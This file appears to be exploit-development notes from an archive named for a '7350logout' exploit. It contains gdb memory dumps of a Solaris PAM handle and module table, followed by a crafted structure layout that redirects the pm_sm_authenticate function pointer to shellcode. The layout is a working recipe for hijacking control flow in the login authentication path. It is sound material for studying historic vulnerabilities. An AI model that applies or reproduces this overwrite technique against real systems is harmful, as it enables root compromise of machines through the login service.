summaryrefslogtreecommitdiff
path: root/exploits/7350logout/pam.txt
blob: a62e46465d3ff25d34649362ceb3cc30645d1139 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103

pamh points here:



(gdb) x/256wx 0x29278
struct pam_item ps_item[PAM_MAX_ITEMS = 64]; (64 * 8 bytes = 0x200 bytes)
0x29278:        0x00000000      0x00000000      0x00028db0      0x00000005
0x29288:        0x00000000      0x00000000      0x0002b2a8      0x0000000a
0x29298:        0x00028e40      0x00000000      0x00028dd0      0x00000008
0x292a8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292b8:        0x00000000      0x00000000      0x00028e50      0x00000007
0x292c8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292d8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292e8:        0x00000000      0x00000000      0x00000000      0x00000000
0x292f8:        0x00000000      0x00000000      0x00000000      0x00000000
0x29308:        0x00000000      0x00000000      0x00000000      0x00000000
0x29318:        0x00000000      0x00000000      0x00000000      0x00000000
0x29328:        0x00000000      0x00000000      0x00000000      0x00000000
0x29338:        0x00000000      0x00000000      0x00000000      0x00000000
0x29348:        0x00000000      0x00000000      0x00000000      0x00000000
0x29358:        0x00000000      0x00000000      0x00000000      0x00000000
0x29368:        0x00000000      0x00000000      0x00000000      0x00000000
0x29378:        0x00000000      0x00000000      0x00000000      0x00000000
0x29388:        0x00000000      0x00000000      0x00000000      0x00000000
0x29398:        0x00000000      0x00000000      0x00000000      0x00000000
0x293a8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293b8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293c8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293d8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293e8:        0x00000000      0x00000000      0x00000000      0x00000000
0x293f8:        0x00000000      0x00000000      0x00000000      0x00000000
0x29408:        0x00000000      0x00000000      0x00000000      0x00000000
0x29418:        0x00000000      0x00000000      0x00000000      0x00000000
0x29428:        0x00000000      0x00000000      0x00000000      0x00000000
0x29438:        0x00000000      0x00000000      0x00000000      0x00000000
0x29448:        0x00000000      0x00000000      0x00000000      0x00000000
0x29458:        0x00000000      0x00000000      0x00000000      0x00000000
0x29468:        0x00000000      0x00000000      0x00000000      0x00000000

pamtab * pam_conf_info[PAM_NUM_MODULE_TYPES = 4]; (4 * 4 bytes = 0x10 bytes)
0x29478:        0x000295c0      0x00029638      0x00029700      0x000296b0

0x29488:        0x0002b2d8	; struct pam_module_data *ssd;
0x2948c:        0x00028e70	; fd_list * fd;
0x29490:        0x00000000	; env_list * pam_env;
0x29494:        0x00000000	; char * pam_client_message_version_number;


pamtab, pam_conf_info[0]:
		"login"		AUTH		REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x295c0:        0x00028de0      0x00000000      0x00000001      0x000295e8
0x295d0:        0x00000000      0x00000000      0x00028e60      0x00029610

pamtab, pam_conf_info[1]:
		"login"		ACCOUNT		REQUISITE	"/usr/lib/security/pam_roles.so.1"
0x29638:        0x00028e10      0x00000001      0x00000008      0x0002a038
0x29648:        0x00000000      0x00000000      0x00000000      0x00029660

pamtab, pam_conf_info[2]:
		"other"		PASSWORD	REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x29700:        0x00028e30      0x00000002      0x00000001      0x00029728
0x29710:        0x00000000      0x00000000      0x00000000      0x00000000

pamtab, pam_conf_info[3]:
		"other"		SESSION		REQUIRED	"/usr/lib/security/pam_unix.so.1"
0x296b0:        0x00028e20      0x00000003      0x00000001      0x000296d8
0x296c0:        0x00000000      0x00000000      0x00000000      0x00000000


pam_conf_info[0]->function_ptr:
0x28e60:        0xef4d4a70      0x00000000      0x00000009      0x00000000
0x28e70:        0xef6f060c      0x00028e90      0x00000009      0x00000000
0x28e80:        0xef4b091c      0x00000000      0x00000009      0x00000000
0x28e90:        0xef6f0c50      0x00000000      0x00000009      0x00000000
0x28ea0:        0x00028eb0      0xefffb1f0      0x00000009      0x00000000
0x28eb0:        0x00000000      0x00000000      0x00000009      0x00000000



pamh ->
	[512 * NULL]	ps_item, ps_item[2] = { "foo", 3 }
	[pameptr]	pam_conf_info[0] (AUTH)
	[3 * NULL]	pam_conf_info[1-3]
	[NULL]		ssd
	[NULL]		fd
	[NULL]		pam_env
	[NULL]		pam_client_message_version_number

pameptr ->
	[NULL]		pam_service
	[NULL]		pam_type
	[NULL]		pam_flag
	[NULL]		module_path
	[NULL]		module_argc
	[NULL]		module_argv
	[pamfptr]	function_ptr

pamfprt ->
	[entry]		pm_sm_authenticate()

entry -> shellcode